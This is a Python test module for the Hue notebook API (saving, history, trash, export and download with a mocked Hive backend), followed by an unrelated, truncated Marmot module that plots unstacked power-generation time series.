# limitations under the License.
import json
from collections import OrderedDict
from nose.tools import assert_equal, assert_true, assert_false
from django.contrib.auth.models import User
from django.urls import reverse
from azure.conf import is_adls_enabled
from desktop import appmanager
from desktop.conf import APP_BLACKLIST
from desktop.lib.django_test_util import make_logged_in_client
from desktop.lib.test_utils import grant_access, add_permission
from desktop.models import Directory, Document, Document2
from hadoop import cluster as originalCluster
import notebook.connectors.hiveserver2
from notebook.api import _historify
from notebook.connectors.base import Notebook, QueryError, Api
from notebook.decorators import api_error_handler
from notebook.conf import get_ordered_interpreters, INTERPRETERS_SHOWN_ON_WHEEL, INTERPRETERS
from notebook.models import Analytics
class TestNotebookApi(object):
  """Tests for the notebook REST API: save, historify, get/clear history and delete.

  Two users are created so permission-sensitive endpoints can be exercised;
  a canned Hive notebook document (id 50010) serves as the shared fixture.
  """

  def setUp(self):
    # Two logged-in clients: the owner ("test") and an unrelated user.
    self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=False)
    self.client_not_me = make_logged_in_client(username="not_perm_user", groupname="default", recreate=True, is_superuser=False)
    self.user = User.objects.get(username="test")
    self.user_not_me = User.objects.get(username="not_perm_user")
    grant_access("test", "default", "notebook")
    grant_access("not_perm_user", "default", "notebook")
    # Canned Hive notebook JSON used as the fixture by the tests below.
    self.notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": 50010,
"snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement_raw":"select * from default.web_logs where app = '${app_name}';","variables":[{"name":"app_name","value":"metastore"}],"statement":"select * from default.web_logs where app = 'metastore';","properties":{"settings":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from default.web_logs where app = 'metastore';","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
"uuid": "5982a274-de78-083c-2efc-74f53dce744c",
"isSaved": false,
"parentUuid": null
}
"""
    self.notebook = json.loads(self.notebook_json)
    # Matching Document2/Document rows so the API can resolve the fixture by id.
    self.doc2 = Document2.objects.create(id=50010, name=self.notebook['name'], type=self.notebook['type'], owner=self.user)
    self.doc1 = Document.objects.link(self.doc2, owner=self.user, name=self.doc2.name,
                                      description=self.doc2.description, extra=self.doc2.type)

  def test_save_notebook(self):
    """Saving maps the document to the requested directory, or the home dir by default."""
    # Test that saving a new document with a new parent will set the parent_directory
    home_dir = Document2.objects.get_home_directory(self.user)
    assert_equal(home_dir.uuid, self.doc2.parent_directory.uuid)
    new_dir = Directory.objects.create(name='new_dir', owner=self.user, parent_directory=home_dir)
    notebook_cp = self.notebook.copy()
    notebook_cp.pop('id')  # no id => the API creates a new document
    notebook_cp['directoryUuid'] = new_dir.uuid
    notebook_json = json.dumps(notebook_cp)
    response = self.client.post(reverse('notebook:save_notebook'), {'notebook': notebook_json})
    data = json.loads(response.content)
    assert_equal(0, data['status'], data)
    doc = Document2.objects.get(pk=data['id'])
    assert_equal(new_dir.uuid, doc.parent_directory.uuid)
    # Test that saving a new document with a no parent will map it to its home dir
    notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": null,
"snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement_raw":"select * from default.web_logs where app = '${app_name}';","variables":[{"name":"app_name","value":"metastore"}],"statement":"select * from default.web_logs where app = 'metastore';","properties":{"settings":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from default.web_logs where app = 'metastore';","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
"uuid": "d9efdee1-ef25-4d43-b8f9-1a170f69a05a"
}
"""
    response = self.client.post(reverse('notebook:save_notebook'), {'notebook': notebook_json})
    data = json.loads(response.content)
    assert_equal(0, data['status'], data)
    doc = Document2.objects.get(pk=data['id'])
    assert_equal(Document2.objects.get_home_directory(self.user).uuid, doc.parent_directory.uuid)
    # Test that saving a notebook will save the search field to the first statement text
    assert_equal(doc.search, "select * from default.web_logs where app = 'metastore';")

  def test_historify(self):
    """_historify creates a new history Document2 plus a linked Document each call."""
    # Starts with no history
    assert_equal(0, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
    assert_equal(1, Document.objects.filter(name__contains=self.notebook['name']).count())
    history_doc = _historify(self.notebook, self.user)
    assert_true(history_doc.id > 0)
    # Test that historify creates new Doc2 and linked Doc1
    assert_equal(1, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
    assert_equal(2, Document.objects.filter(name__contains=self.notebook['name']).count())
    # Historify again
    history_doc = _historify(self.notebook, self.user)
    assert_equal(2, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
    assert_equal(3, Document.objects.filter(name__contains=self.notebook['name']).count())

  def test_get_history(self):
    """get_history returns only the current user's history docs of the requested type."""
    assert_equal(0, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
    _historify(self.notebook, self.user)
    _historify(self.notebook, self.user)
    _historify(self.notebook, self.user)
    assert_equal(3, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
    # History should not return history objects that don't have the given doc type
    Document2.objects.create(name='Impala History', type='query-impala', data=self.notebook_json, owner=self.user, is_history=True)
    # Verify that get_history API returns history objects for given type and current user
    response = self.client.get(reverse('notebook:get_history'), {'doc_type': 'hive'})
    data = json.loads(response.content)
    assert_equal(0, data['status'], data)
    assert_equal(3, len(data['history']), data)
    assert_true(all(doc['type'] == 'query-hive' for doc in data['history']), data)
    # TODO: test that query history for shared query only returns docs accessible by current user

  def test_clear_history(self):
    """clear_history wipes history docs of the given type but keeps saved docs."""
    assert_equal(0, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
    _historify(self.notebook, self.user)
    _historify(self.notebook, self.user)
    _historify(self.notebook, self.user)
    assert_equal(3, Document2.objects.filter(name__contains=self.notebook['name'], is_history=True).count())
    # Clear history should not clear history objects that don't have the given doc type
    Document2.objects.create(name='Impala History', type='query-impala', owner=self.user, is_history=True)
    # clear history should retain original document but wipe history
    response = self.client.post(reverse('notebook:clear_history'), {'notebook': self.notebook_json, 'doc_type': 'hive'})
    data = json.loads(response.content)
    assert_equal(0, data['status'], data)
    assert_false(Document2.objects.filter(type='query-hive', is_history=True).exists())
    assert_true(Document2.objects.filter(type='query-hive', is_history=False).exists())
    assert_true(Document2.objects.filter(type='query-impala', is_history=True).exists())

  def test_delete_notebook(self):
    """Deleting moves the doc to Trash; unknown uuids are reported as errors."""
    trash_notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": null,
"snippets": [{"id": "e069ef32-5c95-4507-b961-e79c090b5abf","type":"hive","status":"ready","database":"default","statement":"select * from web_logs","statement_raw":"select * from web_logs","variables":[],"properties":{"settings":[],"files":[],"functions":[]},"result":{}}],
"uuid": "8a20da5f-b69c-4843-b17d-dea5c74c41d1"
}
"""
    # Assert that the notebook is first saved
    response = self.client.post(reverse('notebook:save_notebook'), {'notebook': trash_notebook_json})
    data = json.loads(response.content)
    assert_equal(0, data['status'], data)
    # Test that deleting it moves it to the user's Trash folder
    notebook_doc = Document2.objects.get(id=data['id'])
    trash_notebooks = [Notebook(notebook_doc).get_data()]
    response = self.client.post(reverse('notebook:delete'), {'notebooks': json.dumps(trash_notebooks)})
    data = json.loads(response.content)
    assert_equal(0, data['status'], data)
    assert_equal('Trashed 1 notebook(s)', data['message'], data)
    response = self.client.get('/desktop/api2/doc', {'path': '/.Trash'})
    data = json.loads(response.content)
    trash_uuids = [doc['uuid'] for doc in data['children']]
    assert_true(notebook_doc.uuid in trash_uuids, data)
    # Test that any errors are reported in the response
    nonexistant_doc = {
      "id": 12345,  # this id does not exist in the database
      "uuid": "ea22da5f-b69c-4843-b17d-dea5c74c41d1",
      "selectedSnippet": "hive",
      "showHistory": False,
      "description": "Test Hive Query",
      "name": "Test Hive Query",
      "sessions": [
        {
          "type": "hive",
          "properties": [],
          "id": None,
        }
      ],
      "type": "query-hive",
      "snippets": [{
        "id": "e069ef32-5c95-4507-b961-e79c090b5abf",
        "type": "hive",
        "status": "ready",
        "database": "default",
        "statement": "select * from web_logs",
        "statement_raw": "select * from web_logs",
        "variables": [],
        "properties": {"settings": [], "files": [], "functions": []},
        "result": {}
      }]
    }
    trash_notebooks = [nonexistant_doc]
    response = self.client.post(reverse('notebook:delete'), {'notebooks': json.dumps(trash_notebooks)})
    data = json.loads(response.content)
    assert_equal(0, data['status'], data)
    assert_equal('Trashed 0 notebook(s) and failed to delete 1 notebook(s).', data['message'], data)
    assert_equal(['ea22da5f-b69c-4843-b17d-dea5c74c41d1'], data['errors'])

  def test_query_error_encoding(self):
    """QueryError messages with plain, escaped and non-ascii text serialize to JSON cleanly."""

    @api_error_handler
    def send_exception(message):
      # The decorator converts the raised QueryError into a JSON error response.
      raise QueryError(message=message)

    message = """SELECT
a.key,
a.*
FROM customers c, c.addresses a"""
    response = send_exception(message)
    data = json.loads(response.content)
    assert_equal(1, data['status'])

    # Literal backslash-u sequences in the message text.
    message = """SELECT
\u2002\u2002a.key,
\u2002\u2002a.*
FROM customers c, c.addresses a"""
    response = send_exception(message)
    data = json.loads(response.content)
    assert_equal(1, data['status'])

    # Non-ascii characters in the message text.
    message = u"""SELECT
a.key,
a.*
FROM déclenché c, c.addresses a"""
    response = send_exception(message)
    data = json.loads(response.content)
    assert_equal(1, data['status'])
class MockedApi(Api):
  """Stub notebook Api returning a canned, already-complete query result."""

  def execute(self, notebook, snippet):
    # Single-column, single-row table that mimics a finished synchronous query.
    columns = [{
      'name': 'test',
      'type': '',
      'comment': ''
    }]
    result = {
      'has_more': False,
      'data': [['test']],
      'meta': columns,
      'type': 'table'
    }
    return {'sync': True, 'has_result_set': True, 'result': result}

  def close_statement(self, notebook, snippet):
    # Nothing to release for the canned result.
    pass

  def export_data_as_hdfs_file(self, snippet, target_file, overwrite):
    # Pretend the export succeeded and landed exactly at the requested path.
    return {'destination': target_file}
class MockFs(object):
  """Minimal in-memory stand-in for the HDFS client used by the notebook tests.

  Fix over the previous version: `user` was declared as a read-only property
  whose getter returned `self.user` (infinite recursion), while `__init__` and
  `setuser()` assigned `self.user` directly — an AttributeError on new-style
  classes / Python 3. The value now lives in `_user` and `user` has both a
  getter and a setter, so attribute-style reads and writes keep working.
  (Deriving from `object` is required for the property to behave on Python 2.)
  """

  def __init__(self, logical_name=None):
    self.fs_defaultfs = 'hdfs://curacao:8020'
    self.logical_name = logical_name if logical_name else ''
    self.DEFAULT_USER = 'test'
    self._user = 'test'
    self._filebrowser_action = ''

  def setuser(self, user):
    # Impersonate `user` for subsequent filesystem calls.
    self._user = user

  @property
  def user(self):
    return self._user

  @user.setter
  def user(self, value):
    # Keep plain attribute assignment (fs.user = ...) backward-compatible.
    self._user = value

  def do_as_user(self, username, fn, *args, **kwargs):
    # The mock never really impersonates; return an empty result.
    return ''

  def exists(self, path):
    # Every path "exists" in the mock filesystem.
    return True

  def isdir(self, path):
    # Only the test home directory is treated as a directory.
    return path == '/user/hue'

  def filebrowser_action(self):
    return self._filebrowser_action
class TestNotebookApiMocked(object):
  """Notebook API tests that run against a monkey-patched HS2 Api and a mock HDFS."""

  def setUp(self):
    self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=False)
    self.client_not_me = make_logged_in_client(username="not_perm_user", groupname="default", recreate=True, is_superuser=False)
    self.user = User.objects.get(username="test")
    self.user_not_me = User.objects.get(username="not_perm_user")
    # Beware: Monkey patch HS2API Mock API
    if not hasattr(notebook.connectors.hiveserver2, 'original_HS2Api'): # Could not monkey patch base.get_api
      notebook.connectors.hiveserver2.original_HS2Api = notebook.connectors.hiveserver2.HS2Api
    notebook.connectors.hiveserver2.HS2Api = MockedApi
    # Swap the cached default filesystem for the in-memory mock; restored in tearDown.
    originalCluster.get_hdfs()
    self.original_fs = originalCluster.FS_CACHE["default"]
    originalCluster.FS_CACHE["default"] = MockFs()
    grant_access("test", "default", "notebook")
    grant_access("test", "default", "beeswax")
    grant_access("test", "default", "hive")
    grant_access("not_perm_user", "default", "notebook")
    grant_access("not_perm_user", "default", "beeswax")
    grant_access("not_perm_user", "default", "hive")
    add_permission('test', 'has_adls', permname='adls_access', appname='filebrowser')

  def tearDown(self):
    # Undo the monkey patches applied in setUp.
    notebook.connectors.hiveserver2.HS2Api = notebook.connectors.hiveserver2.original_HS2Api
    if originalCluster.FS_CACHE is None:
      originalCluster.FS_CACHE = {}
    originalCluster.FS_CACHE["default"] = self.original_fs

  def test_export_result(self):
    """export_result resolves directory vs file destinations (HDFS and ADLS)."""
    notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": null,
"snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement":"select * from web_logs","properties":{"settings":[],"variables":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from web_logs","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
"uuid": "d9efdee1-ef25-4d43-b8f9-1a170f69a05a"
}
"""
    # Destination is a directory (MockFs.isdir('/user/hue') is True):
    # the notebook name is appended as the file name.
    response = self.client.post(reverse('notebook:export_result'), {
      'notebook': notebook_json,
      'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
      'format': json.dumps('hdfs-file'),
      'destination': json.dumps('/user/hue'),
      'overwrite': json.dumps(False)
    })
    data = json.loads(response.content)
    assert_equal(0, data['status'], data)
    assert_equal('/user/hue/Test Hive Query.csv', data['watch_url']['destination'], data)
    # Destination is a file path: used verbatim.
    response = self.client.post(reverse('notebook:export_result'), {
      'notebook': notebook_json,
      'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
      'format': json.dumps('hdfs-file'),
      'destination': json.dumps('/user/hue/path.csv'),
      'overwrite': json.dumps(False)
    })
    data = json.loads(response.content)
    assert_equal(0, data['status'], data)
    assert_equal('/user/hue/path.csv', data['watch_url']['destination'], data)
    # ADLS destinations are only exercised when ADLS is configured.
    if is_adls_enabled():
      response = self.client.post(reverse('notebook:export_result'), {
        'notebook': notebook_json,
        'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
        'format': json.dumps('hdfs-file'),
        'destination': json.dumps('adl:/user/hue/path.csv'),
        'overwrite': json.dumps(False)
      })
      data = json.loads(response.content)
      assert_equal(0, data['status'], data)
      assert_equal('adl:/user/hue/path.csv', data['watch_url']['destination'], data)

  def test_download_result(self):
    """Downloading a result as CSV streams non-empty content."""
    notebook_json = """
{
"selectedSnippet": "hive",
"showHistory": false,
"description": "Test Hive Query",
"name": "Test Hive Query",
"sessions": [
{
"type": "hive",
"properties": [],
"id": null
}
],
"type": "query-hive",
"id": null,
"snippets": [{"id":"2b7d1f46-17a0-30af-efeb-33d4c29b1055","type":"hive","status":"running","statement":"select * from web_logs","properties":{"settings":[],"variables":[],"files":[],"functions":[]},"result":{"id":"b424befa-f4f5-8799-a0b4-79753f2552b1","type":"table","handle":{"log_context":null,"statements_count":1,"end":{"column":21,"row":0},"statement_id":0,"has_more_statements":false,"start":{"column":0,"row":0},"secret":"rVRWw7YPRGqPT7LZ/TeFaA==an","has_result_set":true,"statement":"select * from web_logs","operation_type":0,"modified_row_count":null,"guid":"7xm6+epkRx6dyvYvGNYePA==an"}},"lastExecuted": 1462554843817,"database":"default"}],
"uuid": "d9efdee1-ef25-4d43-b8f9-1a170f69a05a"
}
"""
    response = self.client.post(reverse('notebook:download'), {
      'notebook': notebook_json,
      'snippet': json.dumps(json.loads(notebook_json)['snippets'][0]),
      'format': 'csv'
    })
    # The download view returns a streaming response; drain it.
    content = "".join(response)
    assert_true(len(content) > 0)
def test_get_interpreters_to_show():
  """Verify get_ordered_interpreters() honours INTERPRETERS_SHOWN_ON_WHEEL.

  When the wheel setting is unset the configured interpreter order is returned
  unchanged; when set (e.g. 'java,pig') the listed interpreters move to the
  front in the given order, followed by the remaining ones.
  """
  default_interpreters = OrderedDict((
    ('hive', {
      'name': 'Hive', 'interface': 'hiveserver2', 'type': 'hive', 'is_sql': True, 'options': {}, 'is_catalog': False,
    }),
    ('spark', {
      'name': 'Scala', 'interface': 'livy', 'type': 'spark', 'is_sql': False, 'options': {}, 'is_catalog': False,
    }),
    ('pig', {
      'name': 'Pig', 'interface': 'pig', 'type': 'pig', 'is_sql': False, 'options': {}, 'is_catalog': False,
    }),
    ('java', {
      'name': 'Java', 'interface': 'oozie', 'type': 'java', 'is_sql': False, 'options': {}, 'is_catalog': False,
    })
  ))

  expected_interpreters = OrderedDict((
    ('java', {
      'name': 'Java', 'interface': 'oozie', 'type': 'java', 'is_sql': False, 'options': {}, 'is_catalog': False,
    }),
    ('pig', {
      'name': 'Pig', 'interface': 'pig', 'is_sql': False, 'type': 'pig', 'options': {}, 'is_catalog': False,
    }),
    ('hive', {
      'name': 'Hive', 'interface': 'hiveserver2', 'is_sql': True, 'type': 'hive', 'options': {}, 'is_catalog': False,
    }),
    ('spark', {
      'name': 'Scala', 'interface': 'livy', 'type': 'spark', 'is_sql': False, 'options': {}, 'is_catalog': False,
    })
  ))

  # Build the reset list incrementally and bind it BEFORE the try block:
  # the previous version assigned `resets` inside the try, so a failure in the
  # first set_for_testing() raised NameError in the finally clause, and a
  # failure in the second one leaked the first override without rollback.
  resets = []
  try:
    resets.append(INTERPRETERS.set_for_testing(default_interpreters))
    resets.append(APP_BLACKLIST.set_for_testing(''))
    appmanager.DESKTOP_MODULES = []
    appmanager.DESKTOP_APPS = None
    appmanager.load_apps(APP_BLACKLIST.get())

    interpreters_shown_on_wheel_unset = get_ordered_interpreters()
    assert_equal(default_interpreters.values(), interpreters_shown_on_wheel_unset,
                 'get_interpreters_to_show should return the same as get_interpreters when '
                 'interpreters_shown_on_wheel is unset. expected: %s, actual: %s'
                 % (default_interpreters.values(), interpreters_shown_on_wheel_unset))

    resets.append(INTERPRETERS_SHOWN_ON_WHEEL.set_for_testing('java,pig'))
    assert_equal(expected_interpreters.values(), get_ordered_interpreters(),
                 'get_interpreters_to_show did not return interpreters in the correct order expected: %s, actual: %s'
                 % (expected_interpreters.values(), get_ordered_interpreters()))
  finally:
    for reset in resets:
      reset()
    # Reload apps so later tests see the pristine configuration.
    appmanager.DESKTOP_MODULES = []
    appmanager.DESKTOP_APPS = None
    appmanager.load_apps(APP_BLACKLIST.get())
class TestAnalytics():
  """Smoke tests for the Analytics stats helpers."""

  def setUp(self):
    self.client = make_logged_in_client(username="test", groupname="default", recreate=True, is_superuser=False)
    self.user = User.objects.get(username="test")

  def test_basic_stats(self):
    """admin/user/query stats should all run without error for a saved query doc."""
    # Create the fixture BEFORE entering the try block: the previous version
    # bound `doc` inside the try, so a creation failure raised NameError from
    # the finally clause instead of surfacing the real error.
    doc, created = Document2.objects.get_or_create(name='test_query_stats', type='query-hive', owner=self.user, data={})
    try:
      Analytics.admin_stats()
      Analytics.user_stats(user=self.user)
      Analytics.query_stats(query=doc)
    finally:
      doc.delete()
|
"""Timeseries generation line plots.
This code creates generation non-stacked line plots.
@author: Daniel Levie
"""
import logging
import pandas as pd
import datetime as dt
import matplotlib.pyplot as plt
import marmot.config.mconfig as mconfig
from marmot.plottingmodules.plotutils.plot_library import SetupSubplot
from marmot.plottingmodules.plotutils.plot_data_helper import PlotDataHelper
from marmot.plottingmodules.plotutils.plot_exceptions import (MissingInputData, MissingZoneData)
class MPlot(PlotDataHelper):
    """generation_unstack MPlot class.

    All the plotting modules use this same class name.
    This class contains plotting methods that are grouped based on the
    current module name.

    The generation_unstack.py module contains methods that are
    related to the timeseries generation of generators, displayed in an
    unstacked line format.

    MPlot inherits from the PlotDataHelper class to assist in creating figures.
    """

    def __init__(self, argument_dict: dict):
        """
        Args:
            argument_dict (dict): Dictionary containing all
                arguments passed from MarmotPlot.
        """
        # iterate over items in argument_dict and set as properties of class
        # see key_list in Marmot_plot_main for list of properties
        for prop in argument_dict:
            self.__setattr__(prop, argument_dict[prop])

        # Instantiation of MPlotHelperFunctions
        super().__init__(self.Marmot_Solutions_folder, self.AGG_BY, self.ordered_gen,
                         self.PLEXOS_color_dict, self.Scenarios, self.ylabels,
                         self.xlabels, self.gen_names_dict, self.TECH_SUBSET,
                         Region_Mapping=self.Region_Mapping)

        self.logger = logging.getLogger('marmot_plot.' + __name__)
        self.curtailment_prop = mconfig.parser("plot_data", "curtailment_property")

    def gen_unstack(self, figure_name: str = None, prop: str = None,
                    start: float = None, end: float = None,
                    timezone: str = "", start_date_range: str = None,
                    end_date_range: str = None, **_):
        """Creates a timeseries plot of generation by technology each plotted as a line.

        If multiple scenarios are passed they will be plotted in a facet plot.
        The plot can be further customized by passing specific values to the
        prop argument.

        Args:
            figure_name (str, optional): User defined figure output name.
                Defaults to None.
            prop (str, optional): Special argument used to adjust specific
                plot settings. Controlled through the plot_select.csv.
                Options available are:

                - Peak Demand
                - Min Net Load
                - Date Range

                Defaults to None.
            start (float, optional): Used in conjunction with the prop argument.
                Will define the number of days to plot before a certain event in
                a timeseries plot, e.g Peak Demand.
                Defaults to None.
            end (float, optional): Used in conjunction with the prop argument.
                Will define the number of days to plot after a certain event in
                a timeseries plot, e.g Peak Demand.
                Defaults to None.
            timezone (str, optional): The timezone to display on the x-axes.
                Defaults to "".
            start_date_range (str, optional): Defines a start date at which to represent data from.
                Defaults to None.
            end_date_range (str, optional): Defines a end date at which to represent data to.
                Defaults to None.

        Returns:
            dict: dictionary containing the created plot and its data table.
        """
        outputs = {}

        # figure_name defaults to None; the previous `'Facet' in figure_name`
        # raised TypeError in that case, so guard the membership test.
        facet = False
        if figure_name and 'Facet' in figure_name:
            facet = True

        if self.AGG_BY == 'zone':
            agg = 'zone'
        else:
            agg = 'region'

        def getdata(scenario_list):
            # List of properties needed by the plot, properties are a set of tuples and contain 3 parts:
            # required True/False, property name and scenarios required, scenarios must be a list.
            properties = [(True, "generator_Generation", scenario_list),
                          (False, f"generator_{self.curtailment_prop}", scenario_list),
                          (False, "generator_Pump_Load", scenario_list),
                          (True, f"{agg}_Load", scenario_list),
                          (False, f"{agg}_Unserved_Energy", scenario_list)]

            # Runs get_formatted_data within PlotDataHelper to populate PlotDataHelper dictionary
            # with all required properties, returns a 1 if required data is missing
            return self.get_formatted_data(properties)

        if facet:
            check_input_data = getdata(self.Scenarios)
            all_scenarios = self.Scenarios
        else:
            check_input_data = getdata([self.Scenarios[0]])
            all_scenarios = [self.Scenarios[0]]

        # Checks if all data required by plot is available, if 1 in list required data is missing
        if 1 in check_input_data:
            outputs = MissingInputData()
            return outputs

        # sets up x, y dimensions of plot
        ncols, nrows = self.set_facet_col_row_dimensions(multi_scenario=all_scenarios)

        # If the plot is not a facet plot, grid size should be 1x1
        if not facet:
            ncols = 1
            nrows = 1

        grid_size = ncols * nrows
        # Used to calculate any excess axis to delete
        plot_number = len(all_scenarios)

        for zone_input in self.Zones:
            self.logger.info(f"Zone = {zone_input}")

            excess_axs = grid_size - plot_number

            mplt = SetupSubplot(nrows, ncols, sharey=True,
                                squeeze=False, ravel_axs=True)
            fig, axs = mplt.get_figure()
            plt.subplots_adjust(wspace=0.05, hspace=0.5)

            # If creating a facet plot the font is scaled by 9% for each added x dimension facet plot
            if ncols > 1:
                font_scaling_ratio = 1 + ((ncols - 1) * 0.09)
                plt.rcParams['xtick.labelsize'] *= font_scaling_ratio
                plt.rcParams['ytick.labelsize'] *= font_scaling_ratio
                plt.rcParams['legend.fontsize'] *= font_scaling_ratio
                plt.rcParams['axes.labelsize'] *= font_scaling_ratio
                plt.rcParams['axes.titlesize'] *= font_scaling_ratio

            data_tables = []
            for i, scenario in enumerate(all_scenarios):
                self.logger.info(f"Scenario = {scenario}")

                try:
                    Stacked_Gen = self["generator_Generation"].get(scenario).copy()
                    if self.shift_leapday == True:
                        Stacked_Gen = self.adjust_for_leapday(Stacked_Gen)
                    Stacked_Gen = Stacked_Gen.xs(zone_input, level=self.AGG_BY)
                except KeyError:
                    # No generation in this zone for this scenario; skip it.
                    continue

                if Stacked_Gen.empty == True:
                    continue

                Stacked_Gen = self.df_process_gen_inputs(Stacked_Gen)

                # Insert Curtailment into gen stack if it exists in database
                Stacked_Curt = self[f"generator_{self.curtailment_prop}"].get(scenario).copy()
                if not Stacked_Curt.empty:
                    curtailment_name = self.gen_names_dict.get('Curtailment', 'Curtailment')
                    if self.shift_leapday == True:
                        Stacked_Curt = self.adjust_for_leapday(Stacked_Curt)
                    if zone_input in Stacked_Curt.index.get_level_values(self.AGG_BY).unique():
                        Stacked_Curt = Stacked_Curt.xs(zone_input, level=self.AGG_BY)
                        Stacked_Curt = self.df_process_gen_inputs(Stacked_Curt)
                        # If using Marmot's curtailment property
                        if self.curtailment_prop == 'Curtailment':
                            Stacked_Curt = self.assign_curtailment_techs(Stacked_Curt)
                        Stacked_Curt = Stacked_Curt.sum(axis=1)
                        Stacked_Curt[Stacked_Curt < 0.05] = 0  # Remove values less than 0.05 MW
                        Stacked_Gen.insert(len(Stacked_Gen.columns), column=curtailment_name, value=Stacked_Curt)  # Insert curtailment into gen stack

                        # Calculates Net Load by removing variable gen + curtailment
                        vre_gen_cat = self.vre_gen_cat + [curtailment_name]
                    else:
                        vre_gen_cat = self.vre_gen_cat
                else:
                    vre_gen_cat = self.vre_gen_cat

                # Adjust list of values to drop depending on if it exists in Stacked_Gen df
                vre_gen_cat = [name for name in vre_gen_cat if name in Stacked_Gen.columns]
                Net_Load = Stacked_Gen.drop(labels=vre_gen_cat, axis=1)
                Net_Load = Net_Load.sum(axis=1)

                # Drop all-zero technology columns before plotting.
                Stacked_Gen = Stacked_Gen.loc[:, (Stacked_Gen != 0).any(axis=0)]

                Load = self[f"{agg}_Load"].get(scenario).copy()
                if self.shift_leapday == True:
                    Load = self.adjust_for_leapday(Load)
                Load = Load.xs(zone_input, level=self.AGG_BY)
                Load = Load.groupby(["timestamp"]).sum()
                Load = Load.squeeze()  # Convert to Series

                Pump_Load = self["generator_Pump_Load"][scenario].copy()
                if Pump_Load.empty:
                    # No pump load data: fall back to a zeroed copy so downstream math works.
                    Pump_Load = self['generator_Generation'][scenario].copy()
                    Pump_Load.iloc[:, 0] = 0
                if self.shift_leapday == True:
                    Pump_Load = self.adjust_for_leapday(Pump_Load)
                Pump_Load = Pump_Load.xs(zone_input, level=self.AGG_BY)
                Pump_Load = Pump_Load.groupby(["timestamp"]).sum()
                Pump_Load = Pump_Load.squeeze()  # Convert to Series
                if (Pump_Load == 0).all() == False:
                    Pump_Load = Load - Pump_Load
                else:
                    Pump_Load = Load

                Unserved_Energy = self[f"{agg}_Unserved_Energy"][scenario].copy()
                if Unserved_Energy.empty:
                    # No unserved energy data: fall back to a zeroed copy of Load.
                    Unserved_Energy = self[f"{agg}_Load"][scenario].copy()
                    Unserved_Energy.iloc[:, 0] = 0
                if self.shift_leapday == True:
                    Unserved_Energy = self.adjust_for_leapday(Unserved_Energy)
                Unserved_Energy = Unserved_Energy.xs(zone_input, level=self.AGG_BY)
                Unserved_Energy = Unserved_Energy.groupby(["timestamp"]).sum()
                Unserved_Energy = Unserved_Energy.squeeze()  # Convert to Series

                if prop == "Peak Demand":
                    peak_pump_load_t = Pump_Load.idxmax()
                    end_date = peak_pump_load_t + dt.timedelta(days=end)
                    start_date = peak_pump_load_t - dt.timedelta(days=start)
                    # Peak_Pump_Load = Pump_Load[peak_pump_load_t]
                    Stacked_Gen = Stacked_Gen[start_date: end_date]
                    Load = Load[start_date: end_date]
                    Unserved_Energy = Unserved_Energy[start_date: end_date]
                    Pump_Load = Pump_Load[start_date: end_date]

                elif prop == "Min Net Load":
                    min_net_load_t = Net_Load.idxmin()
                    end_date = min_net_load_t + dt.timedelta(days=end)
                    start_date = min_net_load_t - dt.timedelta(days=start)
                    # Min_Net_Load = Net_Load[min_net_load_t]
                    Stacked_Gen = Stacked_Gen[start_date: end_date]
                    Load = Load[start_date: end_date]
                    Unserved_Energy = Unserved_Energy[start_date: end_date]
                    Pump_Load = Pump_Load[start_date: end_date]

                elif pd.notna(start_date_range):
                    self.logger.info(f"Plotting specific date range: {str(start_date_range)} to {str(end_date_range)}")
                    Stacked_Gen = Stacked_Gen[start_date_range: end_date_range]
                    Load = Load[start_date_range: end_date_range]
